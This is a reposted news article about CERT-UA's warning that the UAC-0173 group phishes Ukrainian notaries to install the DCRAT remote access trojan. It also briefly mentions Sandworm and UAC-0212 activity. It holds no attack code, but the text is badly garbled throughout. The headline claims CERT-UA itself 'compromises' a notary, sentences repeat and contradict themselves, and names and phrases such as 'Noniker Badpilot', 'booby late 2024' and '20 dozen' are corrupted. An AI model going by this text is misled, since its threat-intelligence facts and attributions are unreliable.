Close Menu
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
What's Hot

European Innovation Methods to Turn Research into Market Success

Sewage runoff and coastal winds fuel microplastic pollution

ServiceNow Flaw CVE-2025-3648 can lead to data exposure via misunderstood ACLS

Facebook X (Twitter) Instagram
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
Facebook X (Twitter) Instagram
Fyself News
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
Fyself News
Home » CERT-UA compromises Ukrainian notary by deploying DCRAT warning against UAC-0173 attack
Identity

CERT-UA compromises Ukrainian notary by deploying DCRAT warning against UAC-0173 attack

userBy userFebruary 26, 2025No Comments3 Mins Read
Share Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Copy Link
Follow Us
Google News Flipboard
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link

February 26, 2025Ravi LakshmananNetwork Security/Threat Intelligence

On Tuesday, the Ukrainian Computer Emergency Response Team (CERT-UA) has reported that it was a group of organized crimes tracked as UAC-0173, a remote access trojan horse called DCRAT (aka DarkCrystal Rat), which was tracked as UAC-0173, which involves infecting computers. We have warned about update activities.

Ukrainian cybersecurity authorities said the latest wave of attacks, which began in mid-January 2025, had been observed. The activities are designed to target Ukrainian notaries.

The infection chain utilizes phishing emails claiming it will be sent on behalf of the Ukrainian Ministry of Justice, urging recipients to download the executable file. The binaries are hosted on CloudFlare’s R2 cloud storage service.

Cybersecurity

“Attackers who have provided key access to the automated workplace of notaries in this way will take measures specifically to add RDPWrapper, which implements the functionality of parallel RDP sessions. This is In conjunction with the use of bore utility, Cert-UA directly establishes an RDP connection from the Internet to your computer.

Attacks can be used to intercept authentication data entered into the Web interface of the status register, NMAP for network scans, and XWORM for stealing sensitive data such as credentials and clipboard content, and other tools such as fiddler and other tools. It is also characterized by using malware families.

Additionally, the compromised system is used as a conduit for drafting and sending malicious emails using the sendmail console utility to further propagate the attack.

Development believes that CERT-UA attributes subclusters within the sandworm hacking group (aka APT44, Seashell Blizzard, and UAC-0002) to exploit the currently patched security flaws in Microsoft Windows (CVE-2024-38213) CVSS score: 6.5) via document locked up in the booby late 2024.

The attack chain is known to run PowerShell commands responsible for viewing decoy files, but at the same time launches additional payloads in the background, including Golang loaders named SecondBeSt (aka EmpirePast), Spark, and Crookbag.

Cybersecurity

Activities attributable to UAC-0212 will be targeting supplier companies in Serbia, Czech Republic and Ukraine between July 2024 and February 2025, some of which are 20 dozen specialized in the development of automated process control systems. These are recorded for Ukrainian companies (ACST), electrical work, and freight transport.

Some of these attacks have been documented by Strikeready Labs and Microsoft, the latter tracking threat groups under Noniker Badpilot.

Did you find this article interesting? Follow us on Twitter and LinkedIn to read exclusive content you post.

Source link

Follow on Google News Follow on Flipboard
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Previous ArticleMalicious PYPI package “AutomSLC” enables 104K+ illicit deether music download
Next Article Returning ETS-2 revenue to citizens for a fair transition
user
  • Website

Related Posts

ServiceNow Flaw CVE-2025-3648 can lead to data exposure via misunderstood ACLS

July 10, 2025

The Future of Process Automation is Here: Meet TwinH

July 9, 2025

Gold Melody IAB exploits exposed ASP.NET machine keys to unauthorized access to targets

July 9, 2025
Add A Comment
Leave A Reply Cancel Reply

Latest Posts

European Innovation Methods to Turn Research into Market Success

Sewage runoff and coastal winds fuel microplastic pollution

ServiceNow Flaw CVE-2025-3648 can lead to data exposure via misunderstood ACLS

Why isn’t Cluely’s Roy Lee sweating cheating?

Trending Posts

Subscribe to News

Subscribe to our newsletter and never miss our latest news

Please enable JavaScript in your browser to complete this form.
Loading

Welcome to Fyself News, your go-to platform for the latest in tech, startups, inventions, sustainability, and fintech! We are a passionate team of enthusiasts committed to bringing you timely, insightful, and accurate information on the most pressing developments across these industries. Whether you’re an entrepreneur, investor, or just someone curious about the future of technology and innovation, Fyself News has something for you.

The Future of Process Automation is Here: Meet TwinH

Robots Play Football in Beijing: A Glimpse into China’s Ambitious AI Future

TwinH: A New Frontier in the Pursuit of Immortality?

Meta’s Secret Weapon: The Superintelligence Unit That Could Change Everything 

Facebook X (Twitter) Instagram Pinterest YouTube
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
© 2025 news.fyself. Designed by by fyself.

Type above and press Enter to search. Press Esc to cancel.